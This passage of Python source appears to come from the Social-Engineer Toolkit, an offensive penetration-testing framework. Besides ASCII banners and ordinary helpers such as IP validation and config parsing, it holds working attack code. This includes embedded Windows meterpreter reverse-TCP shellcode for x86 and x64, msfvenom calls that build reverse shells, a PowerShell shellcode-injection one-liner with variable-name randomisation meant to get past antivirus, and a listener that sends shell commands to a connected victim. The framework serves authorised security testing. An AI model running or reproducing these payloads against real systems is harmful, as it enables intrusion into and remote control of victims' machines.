| | | -_|_ -| | |_ -| --| | _| |_ -| _|
|_____|___|___|___|___|_____|__|__|_| |_|___|_|
""" + bcolors.ENDC)
return
if menu == 6:
print(bcolors.PURPLE + r"""
|
\ /
.---.
'-. | | .-'
___| |___
-= [ ] =-
`---. .---'
__||__ | | __||__
'-..-' | | '-..-'
|| | | ||
||_.-| |-,_||
.-"` `"`'` `"-.
.' '.""" + bcolors.ENDC)
return
if menu == 7:
print(bcolors.YELLOW + r"""⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢀⡈⠛⢿⣿⣶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀
⠀⠸⢿⣿⣶⣾⣿⣿⣿⣿⣷⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣴⣾⠇⠀
⠀⠀⢤⣤⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⣠⣤⣴⣶⣶⣾⣿⡿⠟⠋⣁⡀⠀
⠀⠀⠘⢉⣩⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣟⠛⠛⠁⠀
⠀⠀⠀⠈⠻⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⣿⣿⣿⣿⣿⣿⣿⣟⠿⣿⠃⠀⠀
⠀⠀⠀⠀⠀⠈⠻⠟⣿⣿⣿⣿⣿⣿⣿⣿⣄⣿⣿⣿⣿⣿⣿⣿⣿⡷⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⣉⣽⣿⣿⣿⣿⡿⢻⣿⣿⣿⢿⣿⠎⠉⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢀⣤⣴⣶⣾⣿⣿⣿⣿⣿⣿⣿⣦⡀⠈⠉⠉⠁⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣉⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠙⠋⣽⣿⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⠿⠋⣸⣿⡟⢸⣿⣿⠉⣿⣿⡘⢿⡷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠙⠛⠀⢸⣿⡏⠀⠸⠿⠃⠀ """ + bcolors.ENDC)
return
if menu == 8:
print(bcolors.RED + r"""
.========. .========.
// I .'..' \ // VI.'.,".\
|| II .'..'| || VII..'..|
|| III .'."| || VIII,'.'|
|| IV ,','.| || IX.'".'.|
|| V '..'.'| || X .'..',|
.\_________/ .\_________/⠀""" + bcolors.ENDC)
if menu == 9:
print(bcolors.YELLOW + r"""
___
_______ /__/
|.-----.| ,---[___]*
|| || / printer
||_____|| _____ / ____
|o_____*| [o_+_+]--------[=i==]
| ________| 850 drive
| __|_
'-/_==_\
/_____\\ """ + bcolors.ENDC)
if menu == 10:
print(bcolors.GREEN + r"""
__________ __________ __________
| |\| | |\
| * * ||| * * * | * ||
| * * ||| | * ||
| * * ||| * * * | * ||
|__________|||__________|__________||
| || `---------------------`
| * * ||
| ||
| * * ||
|__________||
`----------`""" + bcolors.ENDC)
if menu == 11:
print(bcolors.backBlue + r"""
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣿⡆⠀⠙⢿⣿⣒⠦⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣴⣿⣿⣿⠿⠟⠛⠒⠒⠒⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⠠⠔⠛⠉⠙⠛⢿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣾⣿⣿⣿⣿⣿⣿⣿⣍⣀⣀⠀⠀⠀⠀⡰⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣎⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠴⠿⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠄⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢀⠎⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣀⠀⠀⠀⠀⢀⣠⣾⠕⠁⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⡠⢁⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⡉⠉⠉⠙⠛⠋⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣅⡒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢀⣾⣿⠟⢻⠟⠁⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⡀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠊
⢀⡾⠋⠀⠀⠀⠀⠀⠀⢀⡨⣻⠋⠸⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣦⡤⠤⢄⡒⠯⠖⠁
⠘⠁⠀⠀⠀⠀⠀⠀⠴⢫⠞⠁⠀⠀⠀⠀⠀⠀⠉⠉⠙⠛⠻⣿⣿⣿⠿⣿⣿⢿⣿⣿⢿⣿⣿⣿⣿⡿⢿⣿⣿⢿⣿⣟⢻⣿⣿⡛⠻⠷⠬⠉⠁⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀⠁⠀⠉⠀⠈⠉⠀⠈⠉⠀⠉⠉⠀⠉⠉⠀⠉⠛⠢⠈⠉⠙⠂""" + bcolors.ENDC)
if menu == 12:
print(bcolors.YELLOW + r"""
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|⠀⠀
""")
if menu == 13:
print(bcolors.RED + r"""
.---------.
|.-------.|
||>run# ||
|| ||
|"-------'|
.-^---------^-.
| ---~ AFRIC|
"-------------'""" + bcolors.ENDC)
if menu == 14:
print(bcolors.BOLD + """
.----.
.---------. | == |
|.-"'''"-.| |----|
|| || | == |
|| || |----|
|'-.....-'| |::::|
`"")---(""` |___.|
/:::::::::::\" _ "
/:::=======:::\`\`\
`'''''''''''''` '-'
""" + bcolors.ENDC)
#
# identify if set interactive shells are disabled
#
def set_check():
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
match = re.search("SET_INTERACTIVE_SHELL=OFF", line)
# if we turned it off then we return a true else return false
if match:
return True
match1 = re.search("SET_INTERACTIVE_SHELL=ON", line)
# return false otherwise
if match1:
return False
# if the user specifies 0
def menu_back():
print_info("Returning to the previous menu...")
# used to generate random templates for the phishing schema
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
print (
"Always looking for new templates! In the set/src/templates directory send an email\nto [email protected] if you got a good template!")
author = raw_input(setprompt("0", "Enter the name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
subject = raw_input(setprompt("0", "Enter the subject of the email"))
try:
body = raw_input(setprompt(
"0", "Enter the body of the message, hit return for a new line. Control+c when finished: "))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body += (r"\n")
body += raw_input("Next line of the body: ")
except KeyboardInterrupt:
break
except KeyboardInterrupt:
pass
filewrite = open("src/templates/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print("\n")
filewrite.close()
except Exception as e:
print_error("ERROR:An error occured:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# routine for checking length of a payload: variable equals max choice
def check_length(choice, max):
# start initital loop
counter = 0
while 1:
if counter == 1:
choice = raw_input(bcolors.YELLOW + bcolors.BOLD +
"[!] " + bcolors.ENDC + "Invalid choice try again: ")
# try block in case its not a integer
try:
# check to see if its an integer
choice = int(choice)
# okay its an integer lets do the compare
if choice > max:
# trigger an exception as not an int
choice = "blah"
choice = int(choice)
# if everythings good return the right choice
return choice
# oops, not a integer
except Exception:
counter = 1
# valid if IP address is legit
def is_valid_ip(ip):
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
# ipv4
def is_valid_ipv4(ip):
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
# ipv6
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
pattern = re.compile(r"""
^
\s* # Leading whitespace
(?!.*::.*::) # Only a single whildcard allowed
(?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
(?: # Repeat 6 times:
[0-9a-f]{0,4} # A group of at most four hexadecimal digits
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
){6} #
(?: # Either
[0-9a-f]{0,4} # Another group
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
[0-9a-f]{0,4} # Last group
(?: (?<=::) # Colon iff preceeded by exacly one colon
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
){3}
)
\s* # Trailing whitespace
$
""", re.VERBOSE | re.IGNORECASE | re.DOTALL)
return pattern.match(ip) is not None
# kill certain processes
def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" %
(port), shell=True, stdout=subprocess.PIPE)
stdout_value = proc.communicate()[0]
a = re.search("\d+/%s" % (flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
subprocess.Popen("kill -9 %s" % (b), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True).wait()
# check the config file and return value
def check_config(param):
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
line = line.rstrip()
# print line
# if the line starts with the param we want then we are set, otherwise
# if it starts with a # then ignore
if line.startswith(param) != "#":
if line.startswith(param):
line = line.rstrip()
# remove any quotes or single quotes
line = line.replace('"', "")
line = line.replace("'", "")
line = line.split("=", 1)
return line[1]
# copy an entire folder function
def copyfolder(sourcePath, destPath):
for root, dirs, files in os.walk(sourcePath):
# figure out where we're going
dest = destPath + root.replace(sourcePath, '')
# if we're in a directory that doesn't exist in the destination folder
# then create a new folder
if not os.path.isdir(dest):
os.mkdir(dest)
# loop through all files in the directory
for f in files:
# compute current (old) & new file locations
oldLoc = root + '/' + f
newLoc = dest + '/' + f
if not os.path.isfile(newLoc):
try:
shutil.copy2(oldLoc, newLoc)
except IOError:
pass
# this routine will be used to check config options within the set.options
def check_options(option):
# open the directory
trigger = 0
if os.path.isfile(userconfigpath + "set.options"):
fileopen = open(userconfigpath + "set.options", "r").readlines()
for line in fileopen:
match = re.search(option, line)
if match:
line = line.rstrip()
line = line.replace('"', "")
line = line.split("=")
return line[1]
trigger = 1
if trigger == 0:
return trigger
# future home to update one localized set configuration file
def update_options(option):
# if the file isn't there write a blank file
if not os.path.isfile(userconfigpath + "set.options"):
filewrite = open(userconfigpath + "set.options", "w")
filewrite.write("")
filewrite.close()
# remove old options
fileopen = open(userconfigpath + "set.options", "r")
old_options = ""
for line in fileopen:
match = re.search(option, line)
if match:
line = ""
old_options = old_options + line
# append to file
filewrite = open(userconfigpath + "set.options", "w")
filewrite.write(old_options + "\n" + option + "\n")
filewrite.close()
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
host = '' # Symbolic name meaning the local host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# set is so that when we cancel out we can reuse port
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
print("Listening on 0.0.0.0:%s" % str(port))
# listen for only 1000 connection
s.listen(1000)
conn, addr = s.accept()
print('Connected by', addr)
data = conn.recv(1024)
# start loop
while 1:
command = raw_input("Enter shell command or quit: ")
conn.send(command)
# if we specify quit then break out of loop and close socket
if command == "quit":
break
data = conn.recv(1024)
print(data)
conn.close()
# generates powershell payload
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# generate our shellcode first
shellcode = metasploit_shellcode(payload, ipaddr, port)
try:
# if not "reverse_http" in payload or not "reverse_https" in payload:
if not "http" in payload:
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
# sub in \x for 0x
shellcode = re.sub("\\\\x", "0x", shellcode)
shellcode = shellcode.replace("\\", "")
# base counter
counter = 0
# count every four characters then trigger floater and write out data
floater = ""
# ultimate string
newdata = ""
for line in shellcode:
floater = floater + line
counter = counter + 1
if counter == 4:
newdata = newdata + floater + ","
floater = ""
counter = 0
# heres our shellcode prepped and ready to go
shellcode = newdata[:-1]
except Exception as e:
print_error("Something went wrong, printing error: " + str(e))
# added random vars before and after to change strings - AV you are
# seriously ridiculous.
var1 = "$" + generate_random_string(2, 2) # $1
var2 = "$" + generate_random_string(2, 2) # $c
var3 = "$" + generate_random_string(2, 2) # $2
var4 = "$" + generate_random_string(2, 2) # $3
var5 = "$" + generate_random_string(2, 2) # $x
var6 = "$" + generate_random_string(2, 2) # $t
var7 = "$" + generate_random_string(2, 2) # $h
var8 = "$" + generate_random_string(2, 2) # $z
var9 = "$" + generate_random_string(2, 2) # $g
var10 = "$" + generate_random_string(2, 2) # $i
var11 = "$" + generate_random_string(2, 2) # $w
# one line shellcode injection with native x86 shellcode
powershell_code = (r"""$1 = '$t = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $t -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;){Start-Sleep 60};';$h = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-ec ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $h"}else{;iex "& powershell $2 $h";}""" % (shellcode))
# run it through a lame var replace
powershell_code = powershell_code.replace("$1", var1).replace("$c", var2).replace(
"$2", var3).replace("$3", var4).replace("$x", var5).replace("$t", var6).replace(
"$h", var7).replace("$z", var8).replace("$g", var9).replace("$i", var10).replace(
"$w", var11)
# unicode and base64 encode and return it
return base64.b64encode(powershell_code.encode('utf_16_le')).decode("ascii")
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
# generate payload
port = port.replace("LPORT=", "")
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c" % (msf_path, payload, ipaddr, port), stdout=subprocess.PIPE, shell=True)
data = proc.communicate()[0]
data = data.decode('ascii')
# start to format this a bit to get it ready
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
'unsignedcharbuf[]=', "b'", "'", '\\n']
for repl in repls:
data = data.replace(repl, "")
return data
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
# join the ipaddress into hex value spaces still in tact
ipaddr = ' '.join((hex(int(i))[2:] for i in ip))
# We use a default 255.254.253.252 on all shellcode then replace
# 255.254.253.252 --> hex --> ff fe fd fc
# 443 = '0x1bb'
if port != "443":
port = hex(int(port))
# hack job in order to get ports into right format
# if we are only using three numbers then you have to flux in a zero
if len(port) == 5:
port = port.replace("0x", "\\x0")
else:
port = port.replace("0x", "\\x")
# here we break the counters down a bit to get the port into the right
# format
counter = 0
new_port = ""
for a in port:
if counter < 4:
new_port += a
if counter == 4:
new_port += "\\x" + a
counter = 0
counter = counter + 1
# redefine the port in hex here
port = new_port
ipaddr = ipaddr.split(" ")
first = ipaddr[0]
# split these up to make sure its in the right format
if len(first) == 1:
first = "0" + first
second = ipaddr[1]
if len(second) == 1:
second = "0" + second
third = ipaddr[2]
if len(third) == 1:
third = "0" + third
fourth = ipaddr[3]
if len(fourth) == 1:
fourth = "0" + fourth
# put the ipaddress into the right format
ipaddr = "\\x%s\\x%s\\x%s\\x%s" % (first, second, third, fourth)
shellcode = shellcode.replace(r"\xff\xfe\xfd\xfc", ipaddr)
if port != "443":
# getting everything into the right format
if len(port) > 4:
port = "\\x00" + port
# if we are using a low number like 21, 23, etc.
if len(port) == 4:
port = "\\x00\\x00" + port
shellcode = shellcode.replace(r"\x00\x01\xbb", port)
# return shellcode
return shellcode
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\n Hack the Gibson...and remember...hugs are worth more than handshakes.\n")
sys.exit()
# these are payloads that are callable
def metasploit_shellcode(payload, ipaddr, port):
# if we are using reverse meterpreter tcp
if payload == "windows/meterpreter/reverse_tcp":
shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3"
# reverse https requires generation through msfvenom
if payload == "windows/meterpreter/reverse_https":
print_status(
"Reverse_HTTPS takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse http requires generation through msfvenom
if payload == "windows/meterpreter/reverse_http":
print_status(
"Reverse_HTTP takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# allports requires generation through msfvenom
if payload == "windows/meterpreter/reverse_tcp_allports":
print_status(
"Reverse TCP Allports takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse tcp needs to be rewritten for shellcode, will do later
if payload == "windows/shell/reverse_tcp":
print_status(
"Reverse Shell takes a few seconds to calculate..One moment..")
shellcode = generate_shellcode(payload, ipaddr, port)
# reverse meterpreter tcp
if payload == "windows/x64/meterpreter/reverse_tcp":
shellcode = r"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xff\xfe\xfd\xfc\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x83\xc4\x20\x5e\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff\xe7"
return shellcode
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# random value here to randomize builds
a = 50 * 5
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret, AES.MODE_ECB)
aes = EncodeAES(cipher, data)
return str(aes)
# compare ports to make sure its not already in a config file for metasploit
def check_ports(filename, port):
fileopen = open(filename, "r")
data = fileopen.read()
match = re.search("LPORT " + port, data)
if match:
return True
else:
return False
# the main ~./set path for SET
def setdir():
if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set' + '/')
if check_os() == "windows":
return "src/program_junk/"
# set the main directory for SET
userconfigpath = setdir()
# Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license.
# http://brandon.sternefamily.net/files/mit-license.txt
# CIDR Block Converter - 2007
# convert an IP address from its dotted-quad format to its
# 32 binary digit representation
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
outQuads = 4
for q in inQuads:
if q != "":
b += dec2bin(int(q), 8)
outQuads -= 1
while outQuads > 0:
b += "00000000"
outQuads -= 1
return b
# convert a decimal number to binary representation
# if d is specified, left-pad the binary number with 0s to that length
def dec2bin(n, d=None):
s = ""
while n > 0:
if n & 1:
s = "1" + s
else:
s = "0" + s
n >>= 1
if d is not None:
while len(s) < d:
s = "0" + s
if s == "":
s = "0"
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
ip += str(int(b[i:i + 8], 2)) + "."
return ip[:-1]
